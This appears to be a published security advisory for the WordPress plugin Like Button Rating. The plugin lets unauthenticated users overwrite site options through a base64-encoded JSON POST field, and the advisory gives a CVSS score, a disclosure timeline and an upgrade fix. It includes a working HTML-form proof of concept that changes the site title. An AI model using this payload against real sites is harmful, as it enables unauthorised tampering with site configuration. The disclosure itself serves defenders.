Like Button Rating ♥ LikeBtn allows anybody to set any option


Last revised:

In the init action, this plugin checks to see if $_POST['likebtn_import_config'] is empty. If it’s not empty then it base64-decodes the string, parses it as JSON, and starts changing options.

Current state: Reported

CVSS Summary

CVSS base scores for this vulnerability
Score 6.4 Medium
Vector Network
Complexity Low
Authentication None
Confidentiality Partial
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

The below form will set the “Site Title” option to “Temmie”:

<form method="POST" action="http://localhost/">
 <input type="text" name="likebtn_import_config" value="ewogICJsaWtlYnRuX3NldHRpbmdzX29wdGlvbnMiOiB7CiAgICAiYmxvZ25hbWUiOiAiVGVtbWllIgogIH0KfQo=">
 <input type="submit">

This works whether you’re logged in or not. The base64-encoded JSON above is this:

  "likebtn_settings_options": {
    "blogname": "Temmie"

Advisory timeline

  • 2017-10-27: Discovered
  • 2017-11-02: Reported to vendor via email
  • 2017-11-02: Vendor reported fixed
  • 2018-04-10: Advisory published

Mitigation/further actions

Upgrade to version 2.5.4 or later.